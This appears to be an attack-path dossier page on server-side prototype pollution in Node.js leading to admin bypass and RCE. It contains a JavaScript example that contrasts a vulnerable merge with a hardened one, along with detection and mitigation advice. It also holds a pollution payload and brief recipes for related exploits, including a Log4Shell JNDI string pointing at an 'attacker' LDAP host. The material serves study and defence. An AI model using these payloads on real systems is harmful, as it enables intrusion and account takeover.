Server-side prototype pollution → auth bypass → RCE
Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.
§ Context
Assumed environment: a Node.js app that applies lodash.merge / set-value / hoek or a similar deep-merge helper to a request body without sanitisation, and that reads boolean flags such as `isAdmin` from plain objects, falling back to a default only when the property is absent.
§ Steps
- 01 Code execution on next spawn() [Execution; T1059 Command and Scripting Interpreter]
- 02 Pollute child-process options gadget [Execution; W-PROTOTYPE-SERVER Server-Side Prototype Pollution → RCE]
  Gadget: execArgv / shell.
- 03 Pollute Object.prototype.isAdmin [Execution; W-PROTOTYPE-SERVER Server-Side Prototype Pollution → RCE]
  Payload: `{"__proto__":{"isAdmin":true}}`
- 04 Find unsafe merge sink [Reconnaissance; W-RECON-FINGERPRINT Tech Stack Fingerprinting]
- 05 Reach admin path [Privilege Escalation; W-BFLA Broken Function Level Authorization (API BFLA)]
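The following Node.js snippet is an added illustration of steps 03 and 04 and of the fix a defender would apply; it is not code from the dossier or from any of the libraries it names. It places a minimal deep merge with the classic defect next to a hardened version, feeds both the payload listed under step 03, and then reads `isAdmin` from a fresh object with a destructuring default, which is the check the dossier says gets bypassed. The names `unsafeMerge`, `safeMerge`, `prototypeIsPolluted`, `demonstrate` and `FORBIDDEN_KEYS` are chosen here, and the request body is constructed from the page's own payload.

```javascript
// Added example, not the dossier's code: a vulnerable deep merge next to a
// hardened one, plus a check that Object.prototype has not been polluted.

// Constructed request body: the same payload the dossier lists under step 03.
const POLLUTED_BODY = JSON.parse('{"__proto__":{"isAdmin":true}}');

// Vulnerable sink: a naive deep merge that recurses into every enumerable key.
// JSON.parse produces an *own* property literally named "__proto__", so
// Object.keys() returns it; reading target["__proto__"] then yields
// Object.prototype, and the recursion writes isAdmin onto the global prototype.
function unsafeMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened sink: refuse the three keys that can reach a prototype, descend only
// into *own* properties of the target, and build nested containers with a null
// prototype so nothing inherited can be reached through them.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Detection check usable from a health endpoint or a test suite: Object.prototype
// should never carry an own property that application code did not define.
function prototypeIsPolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name);
}

// Runs one merge implementation against the payload, then reads isAdmin from a
// fresh, unrelated object the way the vulnerable code path does (destructuring
// with a default). The default applies only when the value is undefined, and an
// inherited `true` is not undefined, so the guard passes in the polluted case.
function demonstrate(merge) {
  merge({}, POLLUTED_BODY);                 // the "sink" handling a request body
  const session = {};                       // fresh object, no own isAdmin
  const { isAdmin = false } = session;      // what the authorization check sees
  const polluted = prototypeIsPolluted('isAdmin');
  delete Object.prototype.isAdmin;          // restore a clean prototype afterwards
  return { isAdmin, polluted };
}

console.log('unsafeMerge:', demonstrate(unsafeMerge)); // { isAdmin: true, polluted: true }
console.log('safeMerge:  ', demonstrate(safeMerge));   // { isAdmin: false, polluted: false }
```

The merge-level fix is the primary control because it removes the sink that step 04 looks for. As defence in depth, Node can be started with `--disable-proto=delete` (or `throw`), and `Object.freeze(Object.prototype)` at startup turns any later pollution attempt into a no-op, at the cost of breaking libraries that extend built-in prototypes; test that before enabling it in production.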
§ References
§ Frequently asked
- What is the "Server-side prototype pollution → auth bypass → RCE" attack path?
- Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE. It chains 5 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Code execution on next spawn() (T1059), an execution primitive. Assumed environment: Node.js.
- What is the final impact of this kill-chain?
- The final step lands on Reach admin path (W-BFLA), which falls under Privilege Escalation. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB (shared techniques: 2)
  Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- Log4Shell (CVE-2021-44228) → RCE → lateral (shared techniques: 2)
  Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat (shared techniques: 2)
  Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach (shared techniques: 2)
  Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- FortiGate SSL-VPN pre-auth RCE → config theft (shared techniques: 2)
  Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
- JWT RS256 → HS256 algorithm confusion → admin (shared techniques: 2)
  Server verifies any algorithm declared in the JWT header. Sign an HS256 token using the public RSA key as the HMAC secret — server accepts it as legit.